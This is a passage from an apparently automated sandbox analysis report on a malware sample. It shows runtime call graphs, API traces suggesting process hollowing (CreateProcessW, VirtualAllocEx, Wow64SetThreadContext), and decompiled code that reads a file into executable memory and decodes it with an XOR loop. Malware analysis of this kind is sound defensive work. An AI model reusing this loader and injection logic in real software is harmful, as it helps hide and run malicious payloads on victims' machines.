LeaveCriticalSection 7499->7502 7501 13b7e66 7501->7376 7502->7501 7503->7247 7505 13b637d 7504->7505 7513 13b6394 7504->7513 7506 13b6384 7505->7506 7508 13b63a5 7505->7508 7507 13b1cc3 __cftog_l 58 API calls 7506->7507 7509 13b6389 7507->7509 7515 13b4bfc 7508->7515 7511 13b1e89 __cftog_l 9 API calls 7509->7511 7511->7513 7512 13b8b0f 60 API calls __towlower_l 7514 13b63b0 7512->7514 7513->7160 7514->7512 7514->7513 7516 13b4c0d 7515->7516 7519 13b4c5a 7515->7519 7517 13b36db __write_nolock 58 API calls 7516->7517 7518 13b4c13 7517->7518 7521 13b4c3a 7518->7521 7523 13b7356 7518->7523 7519->7514 7521->7519 7538 13b4f1d 7521->7538 7524 13b7362 __initptd 7523->7524 7525 13b36db __write_nolock 58 API calls 7524->7525 7526 13b736b 7525->7526 7527 13b739a 7526->7527 7528 13b737e 7526->7528 7529 13b442f __lock 58 API calls 7527->7529 7531 13b36db 
__write_nolock 58 API calls 7528->7531 7530 13b73a1 7529->7530 7550 13b73d6 7530->7550 7535 13b7383 7531->7535 7536 13b7391 __initptd 7535->7536 7537 13b17be __lock 58 API calls 7535->7537 7536->7521 7537->7536 7539 13b4f29 __initptd 7538->7539 7540 13b36db __write_nolock 58 API calls 7539->7540 7541 13b4f33 7540->7541 7542 13b4f45 7541->7542 7543 13b442f __lock 58 API calls 7541->7543 7545 13b17be __lock 58 API calls 7542->7545 7547 13b4f53 __initptd 7542->7547 7544 13b4f63 7543->7544 7548 13b4831 _free 58 API calls 7544->7548 7549 13b4f90 7544->7549 7545->7547 7547->7519 7548->7549 7588 13b4fba 7549->7588 7551 13b73e1 ___addlocaleref ___removelocaleref 7550->7551 7553 13b73b5 7550->7553 7551->7553 7557 13b715c 7551->7557 7554 13b73cd 7553->7554 7587 13b4599 LeaveCriticalSection 7554->7587 7556 13b73d4 7556->7535 7565 13b7171 7557->7565 7586 13b71d5 7557->7586 7558 13b7222 7562 13b8d75 ___free_lc_time 58 API calls 7558->7562 7580 13b724b 7558->7580 7559 13b4831 _free 58 API calls 7560 13b71f6 7559->7560 7563 13b4831 _free 58 API calls 7560->7563 7561 13b71a2 7564 13b71c0 7561->7564 7574 13b4831 _free 58 API calls 7561->7574 7566 13b7240 7562->7566 7568 13b7209 7563->7568 7569 13b4831 _free 58 API calls 7564->7569 7565->7561 7570 13b4831 _free 58 API calls 7565->7570 7565->7586 7571 13b4831 _free 58 API calls 7566->7571 7567 13b72aa 7572 13b4831 _free 58 API calls 7567->7572 7573 13b4831 _free 58 API calls 7568->7573 7575 13b71ca 7569->7575 7576 13b7197 7570->7576 7571->7580 7578 13b72b0 7572->7578 7579 13b7217 7573->7579 7581 13b71b5 7574->7581 7582 13b4831 _free 58 API calls 7575->7582 7577 13b8c12 ___free_lconv_mon 58 API calls 7576->7577 7577->7561 7578->7553 7583 13b4831 _free 58 API calls 7579->7583 7580->7567 7584 13b4831 58 API calls _free 7580->7584 7585 13b8d0e ___free_lconv_num 58 API calls 7581->7585 7582->7586 7583->7558 7584->7580 7585->7564 7586->7558 7586->7559 7587->7556 7591 13b4599 LeaveCriticalSection 7588->7591 7590 13b4fc1 7590->7542 
7591->7590 7593 13b1ffb LeaveCriticalSection 7592->7593 7594 13b1fdc 7592->7594 7593->7134 7594->7593 7595 13b1fe3 7594->7595 7598 13b4599 LeaveCriticalSection 7595->7598 7597 13b1ff8 7597->7134 7598->7597 7600 13b14a4 __initptd 7599->7600 7601 13b14e7 7600->7601 7603 13b14df __initptd 7600->7603 7607 13b14ba _memset 7600->7607 7612 13b1f5e 7601->7612 7603->7082 7605 13b1cc3 __cftog_l 58 API calls 7608 13b14d4 7605->7608 7607->7605 7610 13b1e89 __cftog_l 9 API calls 7608->7610 7610->7603 7613 13b1f6e 7612->7613 7614 13b1f90 EnterCriticalSection 7612->7614 7613->7614 7616 13b1f76 7613->7616 7615 13b14ed 7614->7615 7618 13b12b8 7615->7618 7617 13b442f __lock 58 API calls 7616->7617 7617->7615 7619 13b12d3 _memset 7618->7619 7625 13b12ee 7618->7625 7620 13b12de 7619->7620 7619->7625 7629 13b132e 7619->7629 7621 13b1cc3 __cftog_l 58 API calls 7620->7621 7622 13b12e3 7621->7622 7623 13b1e89 __cftog_l 9 API calls 7622->7623 7623->7625 7632 13b1521 7625->7632 7626 13b143f _memset 7630 13b1cc3 __cftog_l 58 API calls 7626->7630 7629->7625 7629->7626 7635 13b2873 7629->7635 7642 13b2a2a 7629->7642 7710 13b2752 7629->7710 7730 13b2897 7629->7730 7630->7622 7633 13b1fcd __wfsopen 2 API calls 7632->7633 7634 13b1527 7633->7634 7634->7603 7636 13b287d 7635->7636 7637 13b2892 7635->7637 7638 13b1cc3 __cftog_l 58 API calls 7636->7638 7637->7629 7639 13b2882 7638->7639 7640 13b1e89 __cftog_l 9 API calls 7639->7640 7641 13b288d 7640->7641 7641->7629 7643 13b2a4b 7642->7643 7644 13b2a62 7642->7644 7645 13b1c8f __write 58 API calls 7643->7645 7646 13b319a 7644->7646 7649 13b2a9c 7644->7649 7648 13b2a50 7645->7648 7647 13b1c8f __write 58 API calls 7646->7647 7650 13b319f 7647->7650 7651 13b1cc3 __cftog_l 58 API calls 7648->7651 7652 13b2aa4 7649->7652 7658 13b2abb 7649->7658 7653 13b1cc3 __cftog_l 58 API calls 7650->7653 7690 13b2a57 7651->7690 7654 13b1c8f __write 58 API calls 7652->7654 7655 13b2ab0 7653->7655 7656 13b2aa9 7654->7656 7657 13b1e89 __cftog_l 9 API calls 7655->7657 7660 
13b1cc3 __cftog_l 58 API calls 7656->7660 7657->7690 7659 13b2ad0 7658->7659 7662 13b2aea 7658->7662 7663 13b2b08 7658->7663 7658->7690 7661 13b1c8f __write 58 API calls 7659->7661 7660->7655 7661->7656 7662->7659 7665 13b2af5 7662->7665 7664 13b48b1 __malloc_crt 58 API calls 7663->7664 7666 13b2b18 7664->7666 7667 13b6c34 __write_nolock 58 API calls 7665->7667 7668 13b2b3b 7666->7668 7669 13b2b20 7666->7669 7670 13b2c09 7667->7670 7673 13b7054 __lseeki64_nolock 60 API calls 7668->7673 7671 13b1cc3 __cftog_l 58 API calls 7669->7671 7672 13b2c82 ReadFile 7670->7672 7677 13b2c1f GetConsoleMode 7670->7677 7674 13b2b25 7671->7674 7675 13b3162 GetLastError 7672->7675 7676 13b2ca4 7672->7676 7673->7665 7680 13b1c8f __write 58 API calls 7674->7680 7681 13b316f 7675->7681 7682 13b2c62 7675->7682 7676->7675 7685 13b2c74 7676->7685 7678 13b2c7f 7677->7678 7679 13b2c33 7677->7679 7678->7672 7679->7678 7683 13b2c39 ReadConsoleW 7679->7683 7680->7690 7684 13b1cc3 __cftog_l 58 API calls 7681->7684 7687 13b1ca2 __dosmaperr 58 API calls 7682->7687 7693 13b2c68 7682->7693 7683->7685 7686 13b2c5c GetLastError 7683->7686 7688 13b3174 7684->7688 7692 13b2f46 7685->7692 7685->7693 7695 13b2cd9 7685->7695 7686->7682 7687->7693 7689 13b1c8f __write 58 API calls 7688->7689 7689->7693 7690->7629 7691 13b4831 _free 58 API calls 7691->7690 7692->7693 7700 13b304c ReadFile 7692->7700 7693->7690 7693->7691 7696 13b2d45 ReadFile 7695->7696 7702 13b2dc6 7695->7702 7697 13b2d66 GetLastError 7696->7697 7708 13b2d70 7696->7708 7697->7708 7698 13b2e83 7704 13b2e33 MultiByteToWideChar 7698->7704 7705 13b7054 __lseeki64_nolock 60 API calls 7698->7705 7699 13b2e73 7703 13b1cc3 __cftog_l 58 API calls 7699->7703 7701 13b306f GetLastError 7700->7701 7709 13b307d 7700->7709 7701->7709 7702->7693 7702->7698 7702->7699 7702->7704 7703->7693 7704->7686 7704->7693 7705->7704 7706 13b7054 __lseeki64_nolock 60 API calls 7706->7708 7707 13b7054 __lseeki64_nolock 60 API calls 7707->7709 7708->7695 7708->7706 
7709->7692 7709->7707 7711 13b275d 7710->7711 7716 13b2772 7710->7716 7712 13b1cc3 __cftog_l 58 API calls 7711->7712 7714 13b2762 7712->7714 7713 13b276d 7713->7629 7715 13b1e89 __cftog_l 9 API calls 7714->7715 7715->7713 7716->7713 7717 13b27a7 7716->7717 7777 13b65a7 7716->7777 7719 13b2873 __filbuf 58 API calls 7717->7719 7720 13b27bb 7719->7720 7744 13b2916 7720->7744 7722 13b27c2 7722->7713 7723 13b2873 __filbuf 58 API calls 7722->7723 7724 13b27e5 7723->7724 7724->7713 7725 13b2873 __filbuf 58 API calls 7724->7725 7726 13b27f1 7725->7726 7726->7713 7727 13b2873 __filbuf 58 API calls 7726->7727 7728 13b27fe 7727->7728 7729 13b2873 __filbuf 58 API calls 7728->7729 7729->7713 7731 13b28a6 7730->7731 7740 13b28a2 _memmove 7730->7740 7732 13b28ad 7731->7732 7735 13b28c0 _memset 7731->7735 7733 13b1cc3 __cftog_l 58 API calls 7732->7733 7734 13b28b2 7733->7734 7736 13b1e89 __cftog_l 9 API calls 7734->7736 7737 13b28ee 7735->7737 7738 13b28f7 7735->7738 7735->7740 7736->7740 7739 13b1cc3 __cftog_l 58 API calls 7737->7739 7738->7740 7742 13b1cc3 __cftog_l 58 API calls 7738->7742 7741 13b28f3 7739->7741 7740->7629 7743 13b1e89 __cftog_l 9 API calls 7741->7743 7742->7741 7743->7740 7745 13b2922 __initptd 7744->7745 7746 13b292f 7745->7746 7749 13b2946 7745->7749 7747 13b1c8f __write 58 API calls 7746->7747 7751 13b2934 7747->7751 7748 13b2a0a 7750 13b1c8f __write 58 API calls 7748->7750 7749->7748 7752 13b295a 7749->7752 7753 13b297d 7750->7753 7754 13b1cc3 __cftog_l 58 API calls 7751->7754 7755 13b2978 7752->7755 7756 13b2985 7752->7756 7761 13b1cc3 __cftog_l 58 API calls 7753->7761 7768 13b293b __initptd 7754->7768 7757 13b1c8f __write 58 API calls 7755->7757 7758 13b2992 7756->7758 7759 13b29a7 7756->7759 7757->7753 7762 13b1c8f __write 58 API calls 7758->7762 7760 13b6c88 ___lock_fhandle 59 API calls 7759->7760 7763 13b29ad 7760->7763 7764 13b299f 7761->7764 7765 13b2997 7762->7765 7766 13b29d3 7763->7766 7767 13b29c0 7763->7767 7771 13b1e89 __cftog_l 9 API calls 
7764->7771 7769 13b1cc3 __cftog_l 58 API calls 7765->7769 7772 13b1cc3 __cftog_l 58 API calls 7766->7772 7770 13b2a2a __read_nolock 70 API calls 7767->7770 7768->7722 7769->7764 7773 13b29cc 7770->7773 7771->7768 7774 13b29d8 7772->7774 7780 13b2a02 7773->7780 7775 13b1c8f __write 58 API calls 7774->7775 7775->7773 7778 13b48b1 __malloc_crt 58 API calls 7777->7778 7779 13b65bc 7778->7779 7779->7717 7783 13b702e LeaveCriticalSection 7780->7783 7782 13b2a08 7782->7768 7783->7782 7787 13b1932 7784->7787 7786 13b17d9 7788 13b193e __initptd 7787->7788 7789 13b442f __lock 51 API calls 7788->7789 7790 13b1945 7789->7790 7791 13b19fe __cinit 7790->7791 7792 13b1973 DecodePointer 7790->7792 7807 13b1a4c 7791->7807 7792->7791 7794 13b198a DecodePointer 7792->7794 7800 13b199a 7794->7800 7796 13b1a5b __initptd 7796->7786 7798 13b19a7 EncodePointer 7798->7800 7799 13b1a43 7801 13b17a8 _doexit 3 API calls 7799->7801 7800->7791 7800->7798 7802 13b19b7 DecodePointer EncodePointer 7800->7802 7803 13b1a4c 7801->7803 7805 13b19c9 DecodePointer DecodePointer 7802->7805 7806 13b1a59 7803->7806 7812 13b4599 LeaveCriticalSection 7803->7812 7805->7800 7806->7786 7808 13b1a2c 7807->7808 7809 13b1a52 7807->7809 7808->7796 7811 13b4599 LeaveCriticalSection 7808->7811 7813 13b4599 LeaveCriticalSection 7809->7813 7811->7799 7812->7806 7813->7808 8496 13b8bc0 8497 13b8bcc __initptd 8496->8497 8498 13b8c03 __initptd 8497->8498 8499 13b442f __lock 58 API calls 8497->8499 8500 13b8be0 8499->8500 8501 13b73d6 __updatetlocinfoEx_nolock 58 API calls 8500->8501 8502 13b8bf0 8501->8502 8504 13b8c09 8502->8504 8507 13b4599 LeaveCriticalSection 8504->8507 8506 13b8c10 8506->8498 8507->8506 8330 13b4985 8331 13b4988 8330->8331 8334 13b7580 8331->8334 8345 13b49b3 DecodePointer 8334->8345 8336 13b7585 8341 13b7590 8336->8341 8346 13b49dc 8336->8346 8338 13b75b8 8340 13b187c _abort 58 API calls 8338->8340 8339 13b759a IsProcessorFeaturePresent 8342 13b75a5 8339->8342 8344 13b75c2 8340->8344 8341->8338 
8341->8339 8343 13b1d2c __call_reportfault 7 API calls 8342->8343 8343->8338 8345->8336 8350 13b49e8 __initptd 8346->8350 8347 13b4a52 8348 13b4a2f DecodePointer 8347->8348 8354 13b4a61 8347->8354 8353 13b4a1e _siglookup 8348->8353 8349 13b4a19 8351 13b36f3 __getptd_noexit 58 API calls 8349->8351 8350->8347 8350->8348 8350->8349 8356 13b4a15 8350->8356 8351->8353 8357 13b4abf 8353->8357 8359 13b187c _abort 58 API calls 8353->8359 8366 13b4a27 __initptd 8353->8366 8355 13b1cc3 __cftog_l 58 API calls 8354->8355 8358 13b4a66 8355->8358 8356->8349 8356->8354 8361 13b442f __lock 58 API calls 8357->8361 8363 13b4aca 8357->8363 8360 13b1e89 __cftog_l 9 API calls 8358->8360 8359->8357 8360->8366 8361->8363 8362 13b4b2c EncodePointer 8364 13b4aff 8362->8364 8363->8362 8363->8364 8367 13b4b5d 8364->8367 8366->8341 8368 13b4b68 8367->8368 8369 13b4b61 8367->8369 8368->8366 8371 13b4599 LeaveCriticalSection 8369->8371 8371->8368

Control-flow Graph

control_flow_graph 0 1103f8-1104e3 GetPEB call 1107a4 * 7 call 110772 CreateFileW 17 1104e9-1104f3 0->17 18 1105cd 0->18 25 1105c9-1105cb 17->25 26 1104f9-110509 VirtualAlloc 17->26 19 1105cf-1105d3 18->19 20 1105d5-1105d7 19->20 21 1105fc-110600 19->21 23 1105d9 20->23 24 1105dd-1105e2 20->24 27 110602-110607 21->27 28 1105e4-1105e9 21->28 23->24 24->21 34 1105c4-1105c7 25->34 26->25 31 11050f-11051e ReadFile 26->31 32 110614-11061a 27->32 33 110609-110611 VirtualFree 27->33 29 1105f2-1105f4 28->29 30 1105eb-1105f0 28->30 36 1105f6-1105f8 29->36 37 1105fa 29->37 30->21 31->25 38 110524-110545 VirtualAlloc 31->38 33->32 34->19 36->21 37->21 39 1105c2 38->39 40 110547-11055c call 11070b 38->40 39->34 43 110593-1105a7 call 1107a4 40->43 44 11055e-110567 40->44 43->19 50 1105a9-1105ab 43->50 45 11056a-110591 call 11070b 44->45 45->43 51 1105b1-1105c0 VirtualFree 50->51 52 1105ad-1105ae CloseHandle 50->52 51->34 52->51

APIs
• CreateFileW.KERNELBASE(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 001104DB
• VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004), ref: 00110502
• ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000), ref: 00110519
• VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 0011053D
• CloseHandle.KERNELBASE(00000000,?), ref: 001105AE
• VirtualFree.KERNELBASE(00000000,00000000,00008000,?), ref: 001105B9
• VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00110611

Memory Dump Source
• Source File: 00000005.00000002.983374301.0000000000110000.00000040.00001000.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
• Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_110000_yldnat.jbxd

Similarity
• API ID: Virtual$AllocFileFree$CloseCreateHandleRead
• String ID:
• API String ID: 721982790-0
• Opcode ID: ac91823fcceb24bdfeaa8284b71a33b08aac73ab2278b65ec93cbc451416ea79
• Instruction ID: 23e7e3ec1d874543399889dcedba6982004996730a8fd7fdd46acb78cc4e355a
                                                        • Opcode Fuzzy Hash: ac91823fcceb24bdfeaa8284b71a33b08aac73ab2278b65ec93cbc451416ea79
                                                        • Instruction Fuzzy Hash: AD619F34E00214ABCF19DBA4C984BEEBBB6AF98710F144129E545EB290DBB49DC1CF94
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph (figure; legend and edge list omitted). Basic blocks 1111be-111481; calls 1106f7, 1107a4 (x7), CreateProcessW, ReadProcessMemory, 110360, VirtualAllocEx, 110261, Wow64SetThreadContext, 1101b2.
                                                        APIs
                                                        • CreateProcessW.KERNEL32(?,00000000), ref: 00111302
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.983374301.0000000000110000.00000040.00001000.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_110000_yldnat.jbxd
                                                        Similarity
                                                        • API ID: CreateProcess
                                                        • String ID: D
                                                        • API String ID: 963392458-2746444292
                                                        • Opcode ID: de44eb80b07b3cc25024ca8b06665abb1d1dc4947ad57d65267bb3f94c5156e7
                                                        • Instruction ID: 41f9b199263ca8a4ff87b00d05586a811bac635f1ece6d99b0d86e7d3a9efc9a
                                                        • Opcode Fuzzy Hash: de44eb80b07b3cc25024ca8b06665abb1d1dc4947ad57d65267bb3f94c5156e7
                                                        • Instruction Fuzzy Hash: 64A1F570E10109EFDB49DFA4C981BEEBBB5BF48744F204465EA16EB290D770AA81DF50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph (figure; legend and edge list omitted). Basic blocks 110809-110a31; calls 1106f7, 1107a4 (x10), CreateFileW, VirtualAlloc, ReadFile, CloseHandle, 110a32, 110e98, ExitProcess.
                                                        APIs
                                                        • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 001109BC
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.983374301.0000000000110000.00000040.00001000.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_110000_yldnat.jbxd
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        • Opcode ID: 47efa2f738dbac7ff5fd3ee764efba75c5530c771d0827437343daff64dab558
                                                        • Instruction ID: fd52e687362eedd8e61ac858e4a4c07ec91efa67575b98c20d31f47e947446e1
                                                        • Opcode Fuzzy Hash: 47efa2f738dbac7ff5fd3ee764efba75c5530c771d0827437343daff64dab558
                                                        • Instruction Fuzzy Hash: DB714B35E50348EADF55DBE4E912BEDB7B5AF88710F204426E109FB2E0DBB11A80DB05
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph (figure; legend and edge list omitted). Basic blocks 13b12b8-13b147b; calls 13b1cc3, 13b1e89, 13b1530, 13b2752, 13b2873, 13b2a2a, 13b2897.
                                                        C-Code - Quality: 69%
                                                        			E013B12B8(char* _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20) {
                                                        				char* _v8;
                                                        				signed int _v12;
                                                        				signed int _v16;
                                                        				signed int _v20;
                                                        				void* __ebx;
                                                        				void* __esi;
                                                        				signed int _t74;
                                                        				signed int _t78;
                                                        				char _t81;
                                                        				signed int _t86;
                                                        				signed int _t88;
                                                        				signed int _t91;
                                                        				signed int _t94;
                                                        				signed int _t97;
                                                        				signed int _t98;
                                                        				char* _t99;
                                                        				signed int _t100;
                                                        				signed int _t102;
                                                        				signed int _t103;
                                                        				signed int _t104;
                                                        				char* _t110;
                                                        				signed int _t113;
                                                        				signed int _t117;
                                                        				signed int _t119;
                                                        				void* _t120;
                                                        
                                                        				_t99 = _a4;
                                                        				_t74 = _a8;
                                                        				_v8 = _t99;
                                                        				_v12 = _t74;
                                                        				if(_a12 == 0) {
                                                        					L5:
                                                        					return 0;
                                                        				}
                                                        				_t97 = _a16;
                                                        				if(_t97 == 0) {
                                                        					goto L5;
                                                        				}
                                                        				if(_t99 != 0) {
                                                        					_t119 = _a20;
                                                        					__eflags = _t119;
                                                        					if(_t119 == 0) {
                                                        						L9:
                                                        						__eflags = _a8 - 0xffffffff;
                                                        						if(_a8 != 0xffffffff) {
                                                        							_t74 = E013B1530(_t99, 0, _a8);
                                                        							_t120 = _t120 + 0xc;
                                                        						}
                                                        						__eflags = _t119;
                                                        						if(_t119 == 0) {
                                                        							goto L3;
                                                        						} else {
                                                        							_t78 = _t74 | 0xffffffff;
                                                        							__eflags = _t97 - _t78 / _a12;
                                                        							if(_t97 > _t78 / _a12) {
                                                        								goto L3;
                                                        							}
                                                        							L13:
                                                        							_t117 = _a12 * _t97;
                                                        							__eflags =  *(_t119 + 0xc) & 0x0000010c;
                                                        							_t98 = _t117;
                                                        							if(( *(_t119 + 0xc) & 0x0000010c) == 0) {
                                                        								_t100 = 0x1000;
                                                        							} else {
                                                        								_t100 =  *(_t119 + 0x18);
                                                        							}
                                                        							_v16 = _t100;
                                                        							__eflags = _t117;
                                                        							if(_t117 == 0) {
                                                        								L41:
                                                        								return _a16;
                                                        							} else {
                                                        								do {
                                                        									__eflags =  *(_t119 + 0xc) & 0x0000010c;
                                                        									if(( *(_t119 + 0xc) & 0x0000010c) == 0) {
                                                        										L24:
                                                        										__eflags = _t98 - _t100;
                                                        										if(_t98 < _t100) {
                                                        											_t81 = E013B2752(_t98, _t119, _t119); // executed
                                                        											__eflags = _t81 - 0xffffffff;
                                                        											if(_t81 == 0xffffffff) {
                                                        												L46:
                                                        												return (_t117 - _t98) / _a12;
                                                        											}
                                                        											_t102 = _v12;
                                                        											__eflags = _t102;
                                                        											if(_t102 == 0) {
                                                        												L42:
                                                        												__eflags = _a8 - 0xffffffff;
                                                        												if(_a8 != 0xffffffff) {
                                                        													E013B1530(_a4, 0, _a8);
                                                        												}
                                                        												 *((intOrPtr*)(E013B1CC3())) = 0x22;
                                                        												L4:
                                                        												E013B1E89();
                                                        												goto L5;
                                                        											}
                                                        											_t110 = _v8;
                                                        											 *_t110 = _t81;
                                                        											_t98 = _t98 - 1;
                                                        											_v8 = _t110 + 1;
                                                        											_t103 = _t102 - 1;
                                                        											__eflags = _t103;
                                                        											_v12 = _t103;
                                                        											_t100 =  *(_t119 + 0x18);
                                                        											_v16 = _t100;
                                                        											goto L40;
                                                        										}
                                                        										__eflags = _t100;
                                                        										if(_t100 == 0) {
                                                        											_t86 = 0x7fffffff;
                                                        											__eflags = _t98 - 0x7fffffff;
                                                        											if(_t98 <= 0x7fffffff) {
                                                        												_t86 = _t98;
                                                        											}
                                                        										} else {
                                                        											__eflags = _t98 - 0x7fffffff;
                                                        											if(_t98 <= 0x7fffffff) {
                                                        												_t44 = _t98 % _t100;
                                                        												__eflags = _t44;
                                                        												_t113 = _t44;
                                                        												_t91 = _t98;
                                                        											} else {
                                                        												_t113 = 0x7fffffff % _t100;
                                                        												_t91 = 0x7fffffff;
                                                        											}
                                                        											_t86 = _t91 - _t113;
                                                        										}
                                                        										__eflags = _t86 - _v12;
                                                        										if(_t86 > _v12) {
                                                        											goto L42;
                                                        										} else {
                                                        											_push(_t86);
                                                        											_push(_v8);
                                                        											_push(E013B2873(_t119)); // executed
                                                        											_t88 = E013B2A2A(); // executed
                                                        											_t120 = _t120 + 0xc;
                                                        											__eflags = _t88;
                                                        											if(_t88 == 0) {
                                                        												 *(_t119 + 0xc) =  *(_t119 + 0xc) | 0x00000010;
                                                        												goto L46;
                                                        											}
                                                        											__eflags = _t88 - 0xffffffff;
                                                        											if(_t88 == 0xffffffff) {
                                                        												L45:
                                                        												_t64 = _t119 + 0xc;
                                                        												 *_t64 =  *(_t119 + 0xc) | 0x00000020;
                                                        												__eflags =  *_t64;
                                                        												goto L46;
                                                        											}
                                                        											_t98 = _t98 - _t88;
                                                        											__eflags = _t98;
                                                        											L36:
                                                        											_v8 = _v8 + _t88;
                                                        											_v12 = _v12 - _t88;
                                                        											_t100 = _v16;
                                                        											goto L40;
                                                        										}
                                                        									}
                                                        									_t94 =  *(_t119 + 4);
                                                        									_v20 = _t94;
                                                        									__eflags = _t94;
                                                        									if(__eflags == 0) {
                                                        										goto L24;
                                                        									}
                                                        									if(__eflags < 0) {
                                                        										goto L45;
                                                        									}
                                                        									__eflags = _t98 - _t94;
                                                        									if(_t98 < _t94) {
                                                        										_t94 = _t98;
                                                        										_v20 = _t98;
                                                        									}
                                                        									_t104 = _v12;
                                                        									__eflags = _t94 - _t104;
                                                        									if(_t94 > _t104) {
                                                        										goto L42;
                                                        									} else {
                                                        										E013B2897(_v8, _t104,  *_t119, _t94);
                                                        										_t88 = _v20;
                                                        										_t120 = _t120 + 0x10;
                                                        										 *(_t119 + 4) =  *(_t119 + 4) - _t88;
                                                        										_t98 = _t98 - _t88;
                                                        										 *_t119 =  *_t119 + _t88;
                                                        										goto L36;
                                                        									}
                                                        									L40:
                                                        									__eflags = _t98;
                                                        								} while (_t98 != 0);
                                                        								goto L41;
                                                        							}
                                                        						}
                                                        					}
                                                        					_t74 = (_t74 | 0xffffffff) / _a12;
                                                        					__eflags = _t97 - _t74;
                                                        					if(_t97 <= _t74) {
                                                        						goto L13;
                                                        					}
                                                        					goto L9;
                                                        				}
                                                        				L3:
                                                        				 *((intOrPtr*)(E013B1CC3())) = 0x16;
                                                        				goto L4;
                                                        			}
                                                        0x013b13ee
                                                        0x013b13f0
                                                        0x013b1477
                                                        0x00000000
                                                        0x013b1477
                                                        0x013b13f6
                                                        0x013b13f9
                                                        0x013b1465
                                                        0x013b1465
                                                        0x013b1465
                                                        0x013b1465
                                                        0x00000000
                                                        0x013b1465
                                                        0x013b13fb
                                                        0x013b13fb
                                                        0x013b13fd
                                                        0x013b13fd
                                                        0x013b1400
                                                        0x013b1403
                                                        0x00000000
                                                        0x013b1403
                                                        0x013b13d8
                                                        0x013b135d
                                                        0x013b1360
                                                        0x013b1363
                                                        0x013b1365
                                                        0x00000000
                                                        0x00000000
                                                        0x013b1367
                                                        0x00000000
                                                        0x00000000
                                                        0x013b136d
                                                        0x013b136f
                                                        0x013b1371
                                                        0x013b1373
                                                        0x013b1373
                                                        0x013b1376
                                                        0x013b1379
                                                        0x013b137b
                                                        0x00000000
                                                        0x013b1381
                                                        0x013b1388
                                                        0x013b138d
                                                        0x013b1390
                                                        0x013b1393
                                                        0x013b1396
                                                        0x013b1398
                                                        0x00000000
                                                        0x013b1398
                                                        0x013b142f
                                                        0x013b142f
                                                        0x013b142f
                                                        0x00000000
                                                        0x013b1354
                                                        0x013b134e
                                                        0x013b1320
                                                        0x013b1303
                                                        0x013b1306
                                                        0x013b1308
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x013b1308
                                                        0x013b12de
                                                        0x013b12e3
                                                        0x00000000

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.983533144.00000000013B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 013B0000, based on PE: true
                                                        • Associated: 00000005.00000002.983529361.00000000013B0000.00000002.00000001.01000000.00000005.sdmp
                                                        • Associated: 00000005.00000002.983545056.00000000013BE000.00000002.00000001.01000000.00000005.sdmp
                                                        • Associated: 00000005.00000002.983553202.00000000013C3000.00000004.00000001.01000000.00000005.sdmp
                                                        • Associated: 00000005.00000002.983563219.00000000013C7000.00000002.00000001.01000000.00000005.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_13b0000_yldnat.jbxd
                                                        Similarity
                                                        • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                        • String ID:
                                                        • API String ID: 1559183368-0
                                                        • Opcode ID: d285b6dd1113a55ae780a990317947fbbdadd265687160ebd386bed1a57fb8fe
                                                        • Instruction ID: acacb248b804a03453a91d40d44469e5890e7d70ccea0f1c8cc7e2e41a98c018
                                                        • Opcode Fuzzy Hash: d285b6dd1113a55ae780a990317947fbbdadd265687160ebd386bed1a57fb8fe
                                                        • Instruction Fuzzy Hash: 2751EA70A013099BDB248F6DE8E05EE7BB5AF40328F148729EB29D6ED0F77499508B41
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        C-Code - Quality: 92%
                                                        			E013B1000(void* __ecx, void* __eflags, intOrPtr _a12) {
                                                        				intOrPtr _v8;
                                                        				void* __ebx;
                                                        				void* __edi;
                                                        				intOrPtr _t6;
                                                        				void* _t7;
                                                        				_Unknown_base(*)()* _t8;
                                                        				intOrPtr _t10;
                                                        				void* _t18;
                                                        				_Unknown_base(*)()* _t19;
                                                        				void* _t24;
                                                        				void* _t25;
                                                        				void* _t26;
                                                        				intOrPtr* _t32;
                                                        
                                                        				_push(_t18);
                                                        				_t26 = 0; // executed
                                                        				_t6 = E013B1147(_t18, _t24, 0, 0x17d78400); // executed (_malloc, see APIs below)
                                                        				 *_t32 = 0x13c3000;
                                                        				_v8 = _t6;
                                                        				_t7 = E013B11D9(_a12, _t25); // executed (__wfsopen: opens the file named by _a12)
                                                        				_t8 = VirtualAlloc(0, 0x1487, 0x3000, 0x40); // executed (0x1487 bytes, MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE)
                                                        				_t19 = _t8;
                                                        				E013B147D(_t19, 0x1487, 1, _t7); // executed (__fread_nolock: reads 0x1487 bytes of the file into the RWX buffer)
                                                        				_t10 = _v8;
                                                        				if(_v8 != 0) {
                                                        					E013B1530(_t10, 0xcb, 0x17d78400); // _memset over the large heap allocation
                                                        					// Decode the buffer in place: each byte becomes ((b + 1) ^ 0xdd) - 0x3b
                                                        					do {
                                                        						 *((char*)(_t19 + _t26)) = ( *((intOrPtr*)(_t19 + _t26)) + 0x00000001 ^ 0x000000dd) - 0x3b;
                                                        						_t26 = _t26 + 1;
                                                        					} while (_t26 < 0x1487);
